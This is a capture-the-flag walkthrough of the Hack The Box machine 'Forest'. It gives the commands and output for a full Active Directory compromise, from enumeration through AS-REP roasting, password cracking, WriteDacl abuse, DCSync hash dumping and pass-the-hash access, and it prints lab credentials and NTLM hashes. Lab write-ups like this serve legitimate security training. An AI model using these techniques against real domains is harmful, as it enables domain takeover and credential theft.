Forest

Personal Rating: Medium

This box was rather easy at first as I just recently completed the HTBA Attacking AD and Windows privilege escalation modules. However, the ACL abuse to Domain Admin was tedious and hard to get to work.

Enumeration

Running an nmap scan:

sudo nmap -p- -sV -sC <IP>

Note that this scan is extensive and not stealthy, which might not be feasible in a real pentesting engagement.

PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Simple DNS Plus
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2023-10-23 12:33:23Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open               Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC
49676/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc        Microsoft Windows RPC
49684/tcp open  msrpc        Microsoft Windows RPC
49706/tcp open  msrpc        Microsoft Windows RPC
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local

This looks like a DC from the open ports. There is no webserver.

SMB Null Authentication

Null Authentication seems to work:

poetry run crackmapexec smb 10.10.10.161 -u '' -p ''
SMB         10.10.10.161    445    FOREST           [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
SMB         10.10.10.161    445    FOREST           [+] htb.local\:

But I could not enumerate shares with this method.

LDAP Enumeration

Running a scan against ldap was successful:

sudo nmap -n -sV --script "ldap* and not brute" 10.10.10.161 > nmap-ldap.txt

• The lockout threshold is 0, so running bruteforces against users would be viable.

• I could enumerate some groups, but that is not interesting at the moment.

Using windapsearch I could fetch more information:

python3 windapsearch.py --dc-ip 10.10.10.161 -l "DC=htb,DC=local" > ldapinfo-windapsearch.txt

The resulting file was massive with nearly 8000 lines.

[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.10.10.161
[+] Getting defaultNamingContext from Root DSE
[+]	Found: DC=htb,DC=local
[+] Attempting bind
[+]	...success! Binded as: 
[+]	 None
[+]	 Using DN: DC=htb,DC=local

<SNIP>

I could enumerate the users and groups though:

python3 /home/user/Documents/windapsearch/windapsearch.py --dc-ip 10.10.10.161 -l "DC=htb,DC=local" -U | grep sAMAccountName

sAMAccountName: Guest
sAMAccountName: DefaultAccount
sAMAccountName: Users
sAMAccountName: Guests
sAMAccountName: Remote Desktop Users
<SNIP>
sAMAccountName: sebastien
sAMAccountName: lucinda
sAMAccountName: andy
sAMAccountName: mark
sAMAccountName: santi
sAMAccountName: test

Before I try a password brute or spray, I want to try to enumerate for Kerberoasting and AS-REPRoasting.

I did not find kerberoastable users with GetUserSPNs.py.

AS-REP Roasting

An AS-REPRoast did work with GetNPUsers.py -dc-ip 10.10.10.161 -request htb.local/

$krb5asrep$23$svc-alfresco@HTB.LOCAL:8a0ea34bea471b1532011ad9ed356eb0$434e5a983d1a2547c41eb1bee9b293b3d14ae7721c818e88e86fce349326e9c059433f821b6b16903c98a7075d035e6a64b3ad3baeef73282357f45d34c833ffd1a376a323e9f67ce3929727983f31a918632406648d91d9edbe7061e6ab42c4c0b3f58b4af1fd15b5c0fbfafca0d6bb1e00fcd9293fac9645d6e53109c3df2618e2aaa082bf294092ccbc3af41c0ea6a62b500423b0e875da6ce1930f35f467593761121ca55aecc113e483d5b46ae39b8c17ad5318d0a87ea2472f6bfed5bdc70d4a298af97337aa89c7966d12fdf50d30b4a8e71562068224726fdad5f9a4a9e88096989e

• With hashcat -a 0 -m 18200 <SNIP> rockyou.txt I could crack the password for the user svc-alfresco:s3rvice

• With these creds I could access the host with evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice

AMSI bypassing, which evil-winrm has an integrated module for, was not required here.

Bloodhound Investigations

Now, since this is a DC and I can authenticate with a domain user, Bloodhound came to mind. The goal is to compromise the Administrator on the local machine, but in this case, this can be accomplished by gaining domain admin privileges. I like to run the SharpHound collector when there is no antivirus blocking it. Otherwise you might use the Powershell version and take further steps to evade AV with Powershell, like an AMSI bypass, heavy obfuscation, stealth options when running it etc.

I exfiltrated the collected zip file using smbserver.py on my machine and 'net use' on the target.

Checking Bloodhound, this path is the first one I looked into:

This can not be abused right now as I would need system privileges on the host to use mimikatz for example. But this one works unprivileged:

'svc-alfresco' is an indirect member of 'ACCOUNT OPERATORS'. We have to set ourselves as a member of "EXCHANGE WINDOWS PERMISSIONS" and then abuse WriteDacl to the domain.

ACL Abuse Path

I could add svc-alfresco to the target group with: Add-ADGroupMember -Identity "EXCHANGE WINDOWS PERMISSIONS" -Members svc-alfresco

The easier versions of the group adding is this:

net user john password123 /add /domain
net group “Exchange Windows Permissions” john /add

The Powershell version, possibly with a Powershell downgrade attack or encoded after an AMSI bypass, would usually be the preferred way here for stealth.

I tried abusing the ACLs for hours, but could not find a solution. This was it in the end, after adding the user john to the Exchange group:

python3 DCSync.py -t 'CN=john,CN=Users,DC=htb,DC=local' -dc forest.htb.local htb.local\\john:password
	python3 secretsdump.py htb.local/john:password@forest.htb.local

I did not know the script DCSync.py and the other scripts I tried did not work. I also tried to do it LoL-style with pure Powershell, but that failed too. The above command yielded what I wanted though:

htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::

Pass the Hash

With evil-winrm and pass-the-hash (-H) I could then access the machine as Admin.

evil-winrm -u Administrator -i <IP> -H '32693b11e6aa90eb43d32c72a07ceea6'

NOTE: The latter part of the NTLM hash is the NT part, which is used for authentication. The former hash is the LM part and is the same for all accounts because it is the default hash for deactivated LM authetication.

Since this machine is a DC, you could now use the krbtgt hash for the 'golden ticket' technique to obtain further persistence.